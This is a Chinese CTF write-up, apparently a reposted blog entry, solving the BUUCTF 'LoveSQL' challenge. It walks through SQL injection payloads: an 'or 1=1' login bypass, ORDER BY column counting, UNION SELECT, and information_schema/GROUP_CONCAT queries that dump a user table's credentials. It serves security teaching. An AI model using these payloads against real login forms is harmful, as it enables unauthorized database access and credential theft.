CTF练习——[极客大挑战 2019]LoveSQL1

Posted hgdehsns

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTF练习——[极客大挑战 2019]LoveSQL1相关的知识,希望对你有一定的参考价值。

一道基础的sql注入练习题,写一下做题思路。

 看到一个登录框,随便输入发现是get传参,尝试是否存在sql注入,username=admin'  password=123456。

页面报错,存在sql注入,尝试使用万能密码。username=admin password=1' or 1=1 -- qwe。成功登录。

 参数username出存在注入点,构造sql语句寻找回显点。步骤如下:

(1)猜解字段数

当username=1' order by 4 -- qwe  password=123456时,页面报错。

 

当username=1' order by 3 -- qwe  password=123456时,页面正常。

判断有三个字段。

(2)寻找回显点

构造sql语句:username=1' union select 1,2,3 -- qew password=123456 ;发现存在两个回显点。

最后,通过构造sql语句,查库名,查表名,查数据,得出flag。

查表名:1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 -- QWE

 

查列名:1' union select 1,2,column_name from information_schema.columns where table_name=表名 and table_schema=database() limit 0,1 -- QWE

 

查字段内容:1' union select 1,字段名,字段名 from 表名 limit 0,1 -- QWE

这里可以用GROUP_CONCAT 函数将多行数据进行整合在一行输出。

查表名:1' union select 1,2,GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database() -- qwe

 

查列名:1' union select 1,2,GROUP_CONCAT(column_name) from information_schema.columns where table_name='geekuser' and table_schema=database() -- qwe

 

查字段内容:1' union select 1,2,group_concat(id,username,password) from geekuser -- qwe 

得出flag。 

以上是关于CTF练习——[极客大挑战 2019]LoveSQL1的主要内容,如果未能解决你的问题,请参考以下文章

[极客大挑战 2019]Havefun (一起来撸猫) CTF复现

CTF [极客大挑战 2019]Secret File 复现

[极客大挑战 2019]PHP CTF题解与分析

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)

[CTF从0到1学习] BUUCTF WEB部分 wp(待完善)